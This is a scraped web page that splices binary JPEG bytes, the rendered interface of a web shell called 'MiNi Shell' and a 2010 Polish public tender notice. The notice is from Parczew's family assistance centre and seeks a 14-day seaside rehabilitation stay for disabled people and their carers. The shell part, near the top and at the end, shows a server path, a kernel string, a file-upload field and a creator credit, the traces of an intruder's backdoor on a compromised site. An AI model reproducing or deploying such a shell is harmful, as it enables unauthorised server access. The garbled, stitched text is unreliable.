JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100611/164206-N-2010.html

<p class="kh_header"><b>Parczew: Zorganizowanie turnusu rehabilitacyjnego dla 50 osób niepełnosprawnych i 19 opiekunów osób niepełnosprawnych nad polskim morzem, w  ramach projektu Lepszy start w dorosłe życie, współfinansowanego ze środków EFS w ramach  PO KL, Priorytet VII, Działanie 7.1., Poddziałanie 7.1.2.</b><br>
<b>Numer ogłoszenia: 164206 - 2010; data zamieszczenia: 11.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Szpitalna 2A, 21-200 Parczew, woj. lubelskie, tel. 83 3552189, faks 83 3552189.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.parczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie turnusu rehabilitacyjnego dla 50 osób niepełnosprawnych i 19 opiekunów osób niepełnosprawnych nad polskim morzem, w  ramach projektu Lepszy start w dorosłe życie, współfinansowanego ze środków EFS w ramach  PO KL, Priorytet VII, Działanie 7.1., Poddziałanie 7.1.2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie turnusu rehabilitacyjnego dla  50 osób niepełnosprawnych i 19 opiekunów osób niepełnosprawnych nad polskim morzem, w ramach projektu Lepszy start w dorosłe życie, współfinansowanego ze środków EFS w ramach  PO KL, Priorytet VII, Działanie 7.1., Poddziałanie 7.1.2.
Turnus obejmuje: 14 dni pobytowych dla 69 osób (w tym 50 osób niepełnosprawnych  i 19 opiekunów).      
           

2. W turnusie uczestniczyć będą osoby z następującymi schorzeniami:	
- z chorobami neurologicznymi
- z chorobą psychiczną
- z cukrzycą
- z dysfunkcją narządu ruchu poruszających się na wózkach inwalidzkich 
(2 osoby);
- z dysfunkcją narządu słuchu
- z dysfunkcją narządu wzroku
- z epilepsją
- ze schorzeniami układu krążenia
- ze schorzeniami układu oddechowego
- ze schorzeniami onkologicznymi 
- upośledzeniem umysłowym
- z dysfunkcją narządu ruchu
- z chorobą przemiany materii
- z chorobą układu moczowo-płciowego

Wykaz osób, wraz z rodzajem w/w schorzeń, Zamawiający dostarczy Wykonawcy najpóźniej na 7 dni przed rozpoczęciem turnusu.

3. Zamawiający wymaga realizacji przedmiotu zamówienia ( 14-dniowego  turnusu) zgodnie z rozporządzeniem Ministra Pracy i Polityki Społecznej w sprawie turnusów rehabilitacyjnych z dnia 15 listopada 2007 r. (Dz. U. z 2007r., Nr 230, poz. 1694).
W ramach realizacji zamówienia Wykonawca zobowiązany jest zapewnić                        w szczególności:

1)	wypoczynek w obiekcie sanatoryjnym lub wypoczynkowym, przystosowanym do realizacji turnusów rehabilitacyjnych, zlokalizowanym w odległości                    do 400 m. od plaży nadmorskiej;
2)	kadrę gwarantującą prawidłową organizację turnusu;
3)	łączny czas zorganizowanych zajęć indywidualnych i grupowych na  turnusie w wymiarze nie mniejszym niż 6 godzin dziennie, a dla osób              z upośledzeniem umysłowym w wymiarze nie mniejszym niż 7 godzin dziennie;
4)	zajęcia specjalistyczne związane z rodzajem przedmiotowego turnusu                 i uwzględniające rodzaj niepełnosprawności lub rodzaj dysfunkcji albo schorzeń uczestników turnusu w wymiarze nie mniejszym niż 60% ogólnego czasu zorganizowanych zajęć dla uczestników turnusu, określonych                    w programie tego turnusu,
5)	badanie lekarskie na początku i na końcu turnusu;
6)	stałą opiekę pielęgniarską i możliwość korzystania z opieki lekarskiej podczas turnusu;
7)	rekompensatę za śniadanie i/lub obiad w dniu rozpoczęcia turnusu dla każdego uczestnika turnusu i opiekuna w formie zamiennika na ognisko z produktami grillowanymi (np. kiełbasa, karkówka) plus dodatki (pieczywo, ketchup, musztarda, soki, herbata, kawa itp.), a w przypadku złej pogody, spotkanie całej grupy np. na świetlicy itp.;
8)	miejsce przy ośrodku do zorganizowania dwóch ognisk integracyjnych (w tym jedno jako forma rekompensaty za śniadanie i/lub obiad z dnia rozpoczęcia turnusu)
9)	rekompensatę za kolację i/lub obiad w dniu zakończenia turnusu dla każdego uczestnika turnusu i opiekuna w formie zapewnienia suchego prowiantu na czas podróży;
10)	 całodzienne wyżywienie w skład którego wchodzą: śniadanie, obiad, kolacja;
11)	 zakwaterowanie w murowanym budynku w pokojach 2 i 3 - osobowych             z pełnym węzłem sanitarnym - umywalka, prysznic  w każdym pokoju. Każdy pokój musi być wyposażony w TV satelitarną oraz czajnik bezprzewodowy;
12)	 wyposażenie pokoi w jednoosobowe łóżka z pościelą, szafy ubraniowe, krzesła i stoliki, szafki przy łóżkach (wyklucza się łóżka piętrowe);
13)	 klimatyzowaną stołówkę na miejscu;
14)	 transport osób autokarem o podwyższonym standardzie z Parczewa                do miejsca pobytu i po zakończonym turnusie z powrotem do Parczewa;
15)	 ubezpieczenie NNW dla każdego uczestnika turnusu i opiekuna obejmujące dojazd uczestników turnusu z miejsca zamieszkania do miejsca odbywania się turnusu oraz dojazd z miejsca odbywania się turnusu do miejsca zamieszkania uczestników turnusu, całodobowy 14 dniowy pobyt na turnusie rehabilitacyjnym, na kwotę nie niższą niż 10 000 zł na jedną osobę.
16)	 co najmniej 27 zabiegów dla każdego uczestnika w trakcie trwania turnusu wybranych wg wskazań lekarza
17)	 animatora dla uczestników turnusu odpowiedzialnego za koordynację pobytu grupy na turnusie;
18)	 opłacenie opłaty uzdrowiskowej/klimatycznej za wszystkich uczestników turnusu i opiekunów, jeśli wymagać będzie tego lokalizacja ośrodka;
19)	 zajęcia kulturalno-oświatowe (wycieczki krajoznawcze, zajęcia taneczne, plastyczne, sportowe itp.);
20)	 program aktywizacji społecznej (warsztaty psychoterapeutyczne obejmujące komunikację interpersonalną, autoprezentację i asertywność) dla 50 uczestników turnusu;
21)	 odpowiednią bazę do prowadzenia rehabilitacji i realizacji programu turnusu, w tym gabinet lekarski lub zabiegowy;
22)	 sprzęt sportowo-rekreacyjny;
4.Turnus rehabilitacyjny powinien być zorganizowany w ośrodku, który:
1)	posiada wpis do rejestru ośrodków, o którym mowa w § 17 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz. U. z 2007r, Nr 230, poz. 1694) realizujących zgodnie z wpisem turnusy rehabilitacyjne dla następujących schorzeń: ruchowe, neurologiczne, upośledzenie umysłowe, choroby psychiczne, choroby narządu wzroku, epilepsji (padaczki), choroby układu pokarmowego, zaburzenia głosu, mowy i słuchu, choroby układu pokarmowego, cukrzyca. 
2)	zapewni osobom niepełnosprawnym odpowiednie warunki pobytu, dostosowane do rodzaju i stopnia niepełnosprawności uczestników turnusu;
3)	posiada odpowiednią bazę do prowadzenia rehabilitacji i realizacji programu turnusu;
4)	posiada tereny rekreacyjno-sportowe (np. wypożyczalnia rowerów, korty tenisowe, boiska do gry w piłkę siatkową, piłkę nożną), zaplecze rehabilitacyjne na terenie ośrodka;
5)	posiada pralnię samoobsługową wyposażoną w pralki automatyczne;
6)	na swoim terenie posiada centrum SPA (m. in. sauna, solarium), kompleks basenowy lub aquapark;
7)	posiada certyfikat bezpieczeństwa.
8)	pomieszczenia, w których odbywać się będą warsztaty psychoterapeutyczne, zostaną oznaczone plakatem Zamawiającego, zawierającym m.in. informację o realizacji projektu ze środków Unii Europejskiej.
9)	Turnus rehabilitacyjny będzie przebiegać zgodnie z programem turnusu rehabilitacyjnego;
10)	 Wykonawca ponosi odpowiedzialność za właściwą realizację usług związanych z przebiegiem turnusu, w tym związanych m.in. z zabiegami leczniczymi, imprezami integracyjnymi i rozwojowymi oraz opieką lekarską;
11)	 Wykonawca zobowiązany jest do wystawienia zaświadczeń dla uczestników turnusu o odbyciu warsztatów psychoterapeutycznych, zawierających informacje o głównym temacie zajęć, datach odbywania kursu wraz z wykazem poszczególnych zagadnień i podaniem ilości godzin do każdego z nich, a także listę obecności na warsztatach z każdego dnia.
12)	 Dyplom z ukończenia warsztatów psychoterapeutycznych oraz lista obecności powinny być oznakowane logotypem Programu Operacyjnego Kapitał Ludzki zgodnie z wzorem przesłanym przez Zamawiającego.
13)  Wykonawca zobowiązany jest do przekazania kopii każdego wydanego dyplomu Zamawiającemu drogą pocztową na adres Zamawiającego.


   5.Wykonawca zobowiązany jest do zapewnienia uczestnikom minimum jednej całodniowej wycieczki lub rejsu statkiem po morzu oraz dla każdego uczestnika pakietu SPA.
    6.Wykonawca ponosi odpowiedzialność za właściwą realizację usług związanych z przebiegiem turnusu, w tym związanych m.in. z zabiegami leczniczymi, imprezami integracyjnymi i rozwojowymi oraz opieką lekarską..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 85.31.25.00-4, 55.13.00.00-0, 55.24.20.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeśli wykaże, że posiada aktualny wpis do rejestru ośrodków OD przyjmujących grupy turnusowe i rejestru organizatorów turnusu OR poświadczające, iż Wykonawca jest uprawniony do prowadzenia turnusów dla osób niepełnosprawnych poruszających się na wózkach inwalidzkich.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeśli wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 3.000.000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 2.Wykonawca w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 6.6.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1)	zmiana kwoty podatku VAT oraz wynagrodzenia brutto określonych w § 5 ust. 1
2)	zmniejszenie wynagrodzenia określonego w § 5 ust. 1. 
3)	zmiana terminu realizacji przedmiotu zamówienia, w przypadku działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie.
2.	Zmiany umowy przewidziane w ust. 1 dopuszczalne są na następujących warunkach: 
ad pkt 1) - kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku VAT;
ad pkt 2) - zmniejszenie wynagrodzenia w przypadku uczestniczenia w turnusach mniejszej, niż określona w § 2 umowy, liczby uczestników turnusu o cenę brutto                 za pobyt jednego uczestnika (osoby niepełnosprawnej, opiekuna lub członka kadry); 
ad pkt 3) - zmiana terminu realizacji przedmiotu zamówienia o czas trwania niesprzyjających warunków atmosferycznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcprparczew.ebip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Parczewie
ul.Szpitalna 2A, 21-200 Warszawa pokój nr. 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2010 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Parczewie
ul.Szpitalna 2A, 21-200 Warszawa pokój nr. 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest w ramach projektu Lepszy start w dorosłe życie, współfinansowanego ze środków EFS w ramach PO KL, Priorytet VII, Działanie 7.1.,Poddziałanie 7.1.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com